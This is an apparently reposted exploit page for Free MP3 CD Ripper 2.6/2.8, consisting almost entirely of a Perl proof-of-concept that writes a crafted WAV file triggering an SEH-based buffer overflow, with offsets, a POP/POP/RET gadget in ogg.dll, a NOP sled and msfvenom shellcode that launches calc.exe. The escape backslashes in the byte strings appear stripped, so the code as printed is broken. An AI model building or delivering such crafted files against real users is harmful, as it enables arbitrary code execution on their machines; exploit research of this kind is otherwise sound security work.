Home / os / blackberry

Free MP3 CD Ripper 2.6 / 2.8 Buffer Overflow

Posted on 24 April 2015

#!/usr/bin/env perl # original p0c https://www.exploit-db.com/exploits/36465/ # credit to TUNISIAN CYBER # however he was attemping to vanilla buffer overflow # in fact it is SEH based exploit # using the address 0x7C9D30D7 is limit the targets #which I assume belongs to OS file didn't work on win7 #yes he did find a buffer overflow since the offset reaches ESP before SEH #in this app, SEH based exploits are more effective and the main vuln in this case should be SEH #This p0c > win 7s & 8s # ThreatActor at CoreRed.com ## my $file = "p0c.wav"; my $buff = "A" x 4116; # offset to SEH my $nseh = "xebx06xffxff"; #dat 8 jmp my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll my $nop = "x90" x 28; #msfvenom -p windows/exec CMD=calc.exe -f perl -b 'x00xffx0ax0d' my $shell = "xdaxcdxd9x74x24xf4xb8x50x99x22x39x5bx33xc9" . "xb1x31x31x43x18x83xc3x04x03x43x44x7bxd7xc5" . "x8cxf9x18x36x4cx9ex91xd3x7dx9exc6x90x2dx2e" . "x8cxf5xc1xc5xc0xedx52xabxccx02xd3x06x2bx2c" . "xe4x3bx0fx2fx66x46x5cx8fx57x89x91xcex90xf4" . "x58x82x49x72xcex33xfexcexd3xb8x4cxdex53x5c" . "x04xe1x72xf3x1fxb8x54xf5xccxb0xdcxedx11xfc" . "x97x86xe1x8ax29x4fx38x72x85xaexf5x81xd7xf7" . "x31x7axa2x01x42x07xb5xd5x39xd3x30xcex99x90" . "xe3x2ax18x74x75xb8x16x31xf1xe6x3axc4xd6x9c" . "x46x4dxd9x72xcfx15xfex56x94xcex9fxcfx70xa0" . "xa0x10xdbx1dx05x5axf1x4ax34x01x9fx8dxcax3f" . "xedx8exd4x3fx41xe7xe5xb4x0ex70xfax1ex6bx8e" . "xb0x03xddx07x1dxd6x5cx4ax9ex0cxa2x73x1dxa5" . "x5ax80x3dxccx5fxccxf9x3cx2dx5dx6cx43x82x5e" . "xa5x20x45xcdx25x89xe0x75xcfxd5"; open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); print "+++++++++++++++++++ ";

 

TOP